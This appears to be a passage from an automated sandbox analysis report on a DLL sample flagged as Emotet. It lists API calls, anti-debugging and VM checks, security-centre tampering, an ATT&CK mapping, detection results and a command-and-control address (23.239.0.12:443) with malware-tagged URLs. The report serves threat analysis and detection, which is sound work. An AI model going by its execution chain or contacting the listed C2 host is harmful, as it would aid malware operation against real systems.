                      Source: svchost.exe, 0000000B.00000002.757908430.000001E536202000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: rundll32.exe, 00000004.00000002.240780829.000002BE35808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000017.00000002.405484969.0000021A88E99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                      Source: svchost.exe, 0000000B.00000002.757994647.000001E53623C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.757980753.0000014B13A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB96550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB96550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB97BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFEFB97BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFFEFB9D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB96550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB96550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB920E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFFEFB920E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFEFB9C7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFFEFB9DF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFFEFB9C39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFFEFB9DF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFFEFB9DF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFFEFB9C6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFFEFB9C2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFFEFB9E1E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFFEFB9C16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFFEFB9C934
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFEFB9C8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFFEFB9C834
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFFEFB9C450
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB94558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFFEFB94558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB9E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFFEFB9E6C0

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000011.00000002.758054301.000001DC41F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Files%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000011.00000002.758013989.000001DC41E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
                      Source: svchost.exe, 00000011.00000002.758054301.000001DC41F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 5.2.regsvr32.exe.620000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14e051b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2be35aa0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ca0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.14e051b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2be35aa0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.ca0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.620000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.758443733.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.758543325.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.243754536.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.243462226.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.240757372.0000014E051B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.240813581.000002BE35AA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		111
                      Process Injection                      		21
                      Masquerading                      		OS Credential Dumping2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		Exfiltration Over Other Network Medium11
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		LSASS Memory51
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)3
                      Virtualization/Sandbox Evasion                      		Security Account Manager3
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection                      		NTDS2
                      Process Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories                      		LSA Secrets1
                      Remote System Discovery                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32                      		DCSync34
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion                      		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626476 Sample: Ns2al4764F Startdate: 14/05/2022 Architecture: WINDOWS Score: 80 44 Antivirus detection for URL or domain 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected Emotet 2->48 7 loaddll64.exe 1 2->7         started        9 svchost.exe 2->9         started        12 svchost.exe 1 1 2->12         started        15 10 other processes 2->15 process3 dnsIp4 17 regsvr32.exe 5 7->17         started        20 cmd.exe 1 7->20         started        22 rundll32.exe 2 7->22         started        24 rundll32.exe 7->24         started        50 Changes security center settings (notifications, updates, antivirus, firewall) 9->50 26 MpCmdRun.exe 1 9->26         started        36 127.0.0.1 unknown unknown 12->36 38 192.168.2.1 unknown unknown 15->38 signatures5 process6 signatures7 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->42 28 regsvr32.exe 17->28         started        32 rundll32.exe 2 20->32         started        34 conhost.exe 26->34         started        process8 dnsIp9 40 23.239.0.12, 443, 49764 LINODE-APLinodeLLCUS United States 28->40 52 System process connects to network (likely due to code injection or exploit) 28->52 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->54 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Ns2al4764F.dll35%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.2be35aa0000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      5.2.regsvr32.exe.620000.1.unpack100%AviraHEUR/AGEN.1215493Download File
                      2.2.regsvr32.exe.ca0000.0.unpack100%AviraHEUR/AGEN.1215493Download File
                      3.2.rundll32.exe.14e051b0000.1.unpack100%AviraHEUR/AGEN.1215493Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://dynamic.t0%URL Reputationsafe
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      https://23.239.0.12/C100%Avira URL Cloudmalware
                      https://23.239.0.12/0%URL Reputationsafe
                      https://23.239.0.12/#mWwn100%Avira URL Cloudmalware
                      https://23.239.0.12/D100%Avira URL Cloudmalware
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://23.239.0.12/true
                      • URL Reputation: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://dev.ditu.live.com/REST/v1/Transit/Stops/svchost.exe, 0000000F.00000002.313436972.000001521A269000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.312935601.000001521A267000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000003.313083570.000001521A245000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl.ver)svchost.exe, 00000014.00000002.664499612.0000017546A89000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405585902.0000021A89700000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000017.00000003.383408735.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383363600.0000021A897D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383647935.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383604204.0000021A897BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.383566783.0000021A8979C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://%s.xboxlive.comsvchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000002.313388422.000001521A253000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313008479.000001521A24C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://support.hotspotshield.com/svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000F.00000002.313364509.000001521A242000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313096828.000001521A241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.313067395.000001521A240000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dynamic.tsvchost.exe, 0000000F.00000002.313431355.000001521A264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.hotspotshield.com/terms/svchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.pango.co/privacysvchost.exe, 00000017.00000003.375973507.0000021A897CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.375914924.0000021A89796000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376057932.0000021A89C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.376000317.0000021A897B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://disneyplus.com/legal.svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000F.00000002.313352467.000001521A23A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.291233892.000001521A231000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://23.239.0.12/Cregsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000F.00000002.313395907.000001521A25C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://23.239.0.12/#mWwnregsvr32.exe, 00000005.00000002.758040549.0000000000561000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://activity.windows.comsvchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.bingmapsportal.comsvchost.exe, 0000000F.00000002.313306707.000001521A213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://23.239.0.12/Dregsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000F.00000003.312973094.000001521A261000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://help.disneyplus.com.svchost.exe, 00000017.00000003.379214403.0000021A8979B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000F.00000002.313356830.000001521A23D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://%s.dnet.xboxlive.comsvchost.exe, 0000000C.00000002.757965014.000002D637E40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		low
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000F.00000003.313031098.000001521A249000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      23.239.0.12
                                                                                      		unknownUnited States
                                                                                      		63949LINODE-APLinodeLLCUStrue

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1
                                                                                      127.0.0.1

                                                                                      General Information

